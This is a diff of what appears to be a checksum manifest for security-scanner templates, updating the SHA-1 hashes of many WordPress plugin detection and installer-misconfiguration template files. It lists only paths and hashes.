http/misconfiguration/installer/knowledgetree-installer.yaml:f4e36b69f4f577a4a5b76c60fd0ce3f47b33fe27 +http/misconfiguration/installer/kodbox-installer.yaml:2ba402298590e00f0a071cd6796ce05bc0c4f930 http/misconfiguration/installer/librenms-installer.yaml:918045c9f38e3d800119f1c8a2c2062a47a20509 http/misconfiguration/installer/limesurvey-installer.yaml:8c8e0b95f4dbcb24a9da331230c2cb9333bf0e0b http/misconfiguration/installer/lmszai-installer.yaml:afa8a8a67c2b987480677086d4d970b59fc1d35f @@ -7220,227 +7221,227 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:ddc246e8ec8247409d160c0ea967635d8f16515a -http/technologies/wordpress/plugins/add-to-any.yaml:cab6c2aeee9e5f36121f61e74c151619d915f99d -http/technologies/wordpress/plugins/admin-menu-editor.yaml:4109eb68ddfe89f983c287af2e3f6d0e20cfef91 +http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 +http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:4161c67c19146d374cbd2351dee1c0fd1df0d6d5 -http/technologies/wordpress/plugins/akismet.yaml:d95f479bf079646e1348e58de52204b8c24430ab +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d +http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:26d96578e2eb406f544b58a7e67cc0cfc33a3213 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:f5a2bae439c43f2ea2dd678f4691a9460b31191d -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:12c2ab4fc4a695fb1b92eaa6b8ba16c717b1ce8c -http/technologies/wordpress/plugins/amp.yaml:9aa8e4968beee281f18035f22b4cbc2e30b25fc5 -http/technologies/wordpress/plugins/antispam-bee.yaml:caef0420e57b40acd303795134e8db6523b909af -http/technologies/wordpress/plugins/astra-sites.yaml:b887cb9369eb9a3a391d93592acbd27dbbc8dca3 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 +http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 +http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c +http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:2e7d16d9e6435a608d3242e9d215925abcb818f0 -http/technologies/wordpress/plugins/backwpup.yaml:94595b24f619a9c782664fed74eb9525d2e8d9b6 -http/technologies/wordpress/plugins/better-search-replace.yaml:3da7567d74f4ab970ebd79cd5d163557b8f44b69 -http/technologies/wordpress/plugins/better-wp-security.yaml:e6ef5e3478fbbb5a0df5d694668c358e9d3f8270 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:483b00ca3502f81dabdfef24bc16d90080aa62c4 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:7712b8fe19e4b174708c0ed1e7f31bf8ea15e8e3 -http/technologies/wordpress/plugins/breeze.yaml:7b245de005aefdac960e995076ee93bd526feaff -http/technologies/wordpress/plugins/broken-link-checker.yaml:155547557c6efcb0b2cce11375b985ae0f401d8e -http/technologies/wordpress/plugins/child-theme-configurator.yaml:1d5996870db803acafa909f04e7d961ad55d29bc -http/technologies/wordpress/plugins/classic-editor.yaml:28f175f85788476ddc7d0ff0175f978ae0b0fae4 -http/technologies/wordpress/plugins/classic-widgets.yaml:12b16d36ceb4ffd10a35050bfa22364049df6aa9 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:e65da6529fca1f70a342c53739afce67e1f00e98 +http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 +http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 +http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 +http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 +http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 +http/technologies/wordpress/plugins/broken-link-checker.yaml:4a4148493de40c756d2829cbfbd4bed442a270bf +http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d +http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 +http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:51b9395d9795c595bac0b209052dd2ebbf2304de -http/technologies/wordpress/plugins/coblocks.yaml:d0bdeab2be72834c96daa2ebaedeae6fdfd2333c -http/technologies/wordpress/plugins/code-snippets.yaml:80f67bd7bfe3a89c709185fdfff352962efba298 -http/technologies/wordpress/plugins/coming-soon.yaml:b89765ba3b7e24ea26eb57e4b9ad3ecc7c5562e0 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:1e685d463d34ad66501134f1ba20f476c4b513f8 -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:7a9f942cb56851afeb94f7ba2ea34ff6eb1c0216 -http/technologies/wordpress/plugins/contact-form-7.yaml:4347a9b3b8763002d0679a762c3e752e3e56afbf -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:d7a8474afa358ae7fd373baf3ed62f921111d732 -http/technologies/wordpress/plugins/cookie-law-info.yaml:63678dd0817d943629d0918d1937cbe70ebff04c -http/technologies/wordpress/plugins/cookie-notice.yaml:9fe2c8374b1c8c00a81d6b7569a1338630cfb59d -http/technologies/wordpress/plugins/copy-delete-posts.yaml:e80ed1cd0b7d485b42f79ec79053682c18475c4e -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:f5cb9c483ca0876e0294d903fee67ae0b1bda9e1 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:01ee1ce92a50b471948ee4ddfd04611d8a28a40a -http/technologies/wordpress/plugins/custom-css-js.yaml:e38ed28718d1d537d083fb0fb87a2225cc8c6a48 -http/technologies/wordpress/plugins/custom-fonts.yaml:68bbacdafcdd3034d300824e7f026c6e1a88f65a -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:02ded27aff49addcbae0bcc030346bada13dcb5f -http/technologies/wordpress/plugins/disable-comments.yaml:0f7954492d139f1a9c419670620af368244ecc6c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:9d79202fab776a10fe8bae90bfacfdf1e832dcc1 -http/technologies/wordpress/plugins/duplicate-page.yaml:eb141f238cc3e96e9be481d96c83197f83fb42a5 -http/technologies/wordpress/plugins/duplicate-post.yaml:cb8e0040ab6cc3bd353690c89bee3a45b7da8159 -http/technologies/wordpress/plugins/duplicator.yaml:83370c792931244136a8e858bbc3abfd3ba98c0a -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:ce19e0015e680b750c03394757be8ed6a838ff42 +http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 +http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d +http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c +http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d +http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 +http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 +http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 +http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 +http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c +http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 +http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 +http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 +http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e +http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:267a33d9096f89f7bcc248165fafe9d2204e9332 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:161ee32490462f86d73b213326d7a79e0d118591 -http/technologies/wordpress/plugins/elementor.yaml:652496207b45a967c17a4ec3e5996d8e7af18587 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9c823bd70666eaf3faa4d6a2a341fd48484aae9c -http/technologies/wordpress/plugins/enable-media-replace.yaml:204d371573e5b999054dc43bffc62e7a9788380b -http/technologies/wordpress/plugins/envato-elements.yaml:cff531cd20a179c4466e2ce14bb57f9c21779de6 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:bbedc6e817c56fc23822e50d16222eb32c254e76 -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:5111b3bd1b406cef75eb55f6d94b7ffb1ab8c438 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e398ef126d184fc6fcd55b0ae7505d07256f5cbd -http/technologies/wordpress/plugins/fast-indexing-api.yaml:24c053160b15f31e0e39c72062b5fe52ba3628cc -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:77ec8fe554120cbb14a16c740ee1e305daf1de5c -http/technologies/wordpress/plugins/flamingo.yaml:e3174104a844d3c585d02eb19a9d0897f2183a0f -http/technologies/wordpress/plugins/fluentform.yaml:d1943c233c3e50d2fdb1389fab2f24debaef34fa -http/technologies/wordpress/plugins/font-awesome.yaml:280ee879887432c096e74713274e7c8dd49a8ddc -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:6e225c4cbe53d2e7aafbbf26b2930d91d9c227cf -http/technologies/wordpress/plugins/formidable.yaml:c274565610f6bb2e51f62609a9eb9f1c745d216a -http/technologies/wordpress/plugins/forminator.yaml:6672cff6385fefc1c8955e4d06063523b4f714ef -http/technologies/wordpress/plugins/ga-google-analytics.yaml:caa6d39075d8845063597b94571b79f53ab63673 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:b50229bb43170beb1599514e8f7f5a7f02f74491 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:ec9b3c5ced0c4d3536759524523c4c3c88420655 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:a715de0a6fb8052a07376e2a9cb4ac5126bf59c2 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:360dd6cf302a3cce49a15ec0dde52c14971c4f62 -http/technologies/wordpress/plugins/google-site-kit.yaml:a6a65409f6341101e9a4b60577161f009d93765c -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:2b3ada3b9410fdad52c8f5b4ae150b6fc53b3892 -http/technologies/wordpress/plugins/gtranslate.yaml:c1d1cbddcc65636be72fad5d4b7e43638c99b1bb -http/technologies/wordpress/plugins/gutenberg.yaml:9befbe85a39cae51c5b4c64bdc45408c58bdfc3e -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a7982134889e1f053a5b070cf2aa05391922f3df +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 +http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 +http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d +http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc +http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 +http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 +http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 +http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e +http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 +http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:289e264cb77a0e49f4d2a8b9eac34894587133ff -http/technologies/wordpress/plugins/header-footer-elementor.yaml:ff01e799b6be6d3a35a634ddb59dc3feeb74971d -http/technologies/wordpress/plugins/header-footer.yaml:f5cb8aac90544afa7f040a90a8d67eb89956483a -http/technologies/wordpress/plugins/health-check.yaml:f13d4b70061eb83da513a41bcac5b663e00a726d -http/technologies/wordpress/plugins/hello-dolly.yaml:e485af168399f371a4d58926eb2a061672c1ade6 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:3de338710c82dfefda14e15ddbee3382bd4a2695 -http/technologies/wordpress/plugins/hostinger.yaml:c258384a825ac6eac2c8ae92dfafc04f9aa7b5b7 -http/technologies/wordpress/plugins/image-optimization.yaml:5f07b51b6b7b535553e91ca5aa4d6d866e6576b4 -http/technologies/wordpress/plugins/imagify.yaml:4fc9ea92ab697691dab04b140a42f77963aac090 -http/technologies/wordpress/plugins/imsanity.yaml:1d1576dbd89ac7eb753aca48558b6a6006476017 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:daa72245e44981687b2cc3aba29ffcd5f23c1096 -http/technologies/wordpress/plugins/instagram-feed.yaml:458c169a77bc4135bc4d257f83ca76433337e51b -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:f52cd9238c91af09d3baa234f3a191a4d9e5a774 -http/technologies/wordpress/plugins/iwp-client.yaml:ce25c25a31a7187cfd8879d1fd44ad8d1c374a63 -http/technologies/wordpress/plugins/jetpack-boost.yaml:91e88e709207c0f1ab4afa8d1bf81f4c4ff077f8 -http/technologies/wordpress/plugins/jetpack.yaml:591f1d72e7a5ff761c8874675eb732e94b51176f -http/technologies/wordpress/plugins/kadence-blocks.yaml:72ad43816aac9f07ba34b8908a8d73524efe0429 -http/technologies/wordpress/plugins/kirki.yaml:7570d1f6135e7e63c7ec3aa53593abf4047bf6d6 -http/technologies/wordpress/plugins/leadin.yaml:affd8d2a63d30a0259beb93e4db946027fa1a405 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:1fd5d5af02c6219c377541f46a6722a9f5949522 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:2c87423132dd97ad7372016decdd8853f266c0f7 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6689a39af5dc7ec18da249c482f464a3d48271b4 -http/technologies/wordpress/plugins/loco-translate.yaml:77b1299345d00406b42d3d6932b42cde23f5e221 -http/technologies/wordpress/plugins/loginizer.yaml:e5a34f2cdc1f0fc78d85074c1a3dbb00b0ba6b6c +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/iwp-client.yaml:b435ab5520345df3f78f16697923cb8b5e529692 +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b87e056e7d92c1f54d889e60f8df239e7c34a972 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:16c00d7f106cecb9ff26aad082287ddf6bc36459 -http/technologies/wordpress/plugins/mailpoet.yaml:f533c59822a849ac5a72167ef4b444d422e89c04 -http/technologies/wordpress/plugins/maintenance.yaml:4b79af954e045c137990aea4b3b6588757cf809d -http/technologies/wordpress/plugins/mainwp-child.yaml:1c93ea665f3fde932eabafe3dea6de8623623f65 -http/technologies/wordpress/plugins/malcare-security.yaml:cb74929d0fbf455a3e358916ca27140d8130c77e -http/technologies/wordpress/plugins/megamenu.yaml:309a43933e21f230b33b617e2fe01d70059e7483 -http/technologies/wordpress/plugins/members.yaml:f3dd3c4a4a4795ef2fb44f585dfa87dffa601080 -http/technologies/wordpress/plugins/meta-box.yaml:bc282759bd18bd2d965cd05084ea0f3592ed0a1c -http/technologies/wordpress/plugins/metform.yaml:bedf2575208a0541a7a922a682bf49fedafda844 -http/technologies/wordpress/plugins/ml-slider.yaml:30d8c14fc93a1f17f8b37228661ef1d73078c8ad -http/technologies/wordpress/plugins/newsletter.yaml:905cd6bb49ae970d72eb6779acd5c7e9f739d55c -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:941bc4efdc298abfefd1494c6f8737c1a848cffd -http/technologies/wordpress/plugins/nextgen-gallery.yaml:92516bac6ca88ef6101e2551dc61b21f27434318 -http/technologies/wordpress/plugins/ninja-forms.yaml:88dbf5de06535618617b26353295eba46812f757 -http/technologies/wordpress/plugins/ocean-extra.yaml:be61ee0c5d97abfd66488eefd8c2b7963264b8cd -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:4418cf2d93f4424c15c70e7a0da0adb3681d94ed -http/technologies/wordpress/plugins/one-click-demo-import.yaml:5e091e30a1c71bdc274089d9cc0ed503e6185d6e -http/technologies/wordpress/plugins/optinmonster.yaml:4ad8cb07518571f36f7dc6c515e3f3d59491c06a -http/technologies/wordpress/plugins/otter-blocks.yaml:89a7de85a503ff04a2908daa2981cbd0ce7c42d2 -http/technologies/wordpress/plugins/password-protected.yaml:f00046786f142c198b62d644865c27cf3dc8809b -http/technologies/wordpress/plugins/pdf-embedder.yaml:5cf27e388bdb2aaa8fe84a83c4a35720b8749ac8 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:285b1f97492cb199c5f4b4bcc5a6dd7ec2c24211 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:b326e2e1c1de75608f7ee28281d3f703fd1e73a9 -http/technologies/wordpress/plugins/pixelyoursite.yaml:a93bc9913476e3325944f90a20438077d21ce57a -http/technologies/wordpress/plugins/polylang.yaml:e79cccf738ce7a25e6145c9571b9161bfe877ae3 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:d30d8653f4bbee111ab91fafaac1db577b4dd3d7 -http/technologies/wordpress/plugins/post-smtp.yaml:a3578c503491eb2ad2738f10e51b7f537c135ea8 -http/technologies/wordpress/plugins/post-types-order.yaml:920b274a5917f67823d80ffdaf48ac100765e204 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:fcab4216ea4da62dc4aab773ffa610bfef0a23d6 -http/technologies/wordpress/plugins/pretty-link.yaml:1edcb37d35b7d5f1b6cb6912efc6abb99c074a57 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:22a2de65aeea94c40440ede29f72921d6076c4de -http/technologies/wordpress/plugins/really-simple-ssl.yaml:41ae12b8da426e732ded14a5d3a388063e5f50a5 -http/technologies/wordpress/plugins/redirection.yaml:b620b614968112e6b40b48ebccf5f84810d18181 -http/technologies/wordpress/plugins/redux-framework.yaml:4672eb789e48ed474952bb40347c3eb98952c976 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:ec6625a0827890109cd95016413c2db10c0760fb -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:717d343cb8da3b7d9777cffa8c4354c3d3c3df27 -http/technologies/wordpress/plugins/safe-svg.yaml:c74fe18757ccf1d53328727b3d68888646a8edee 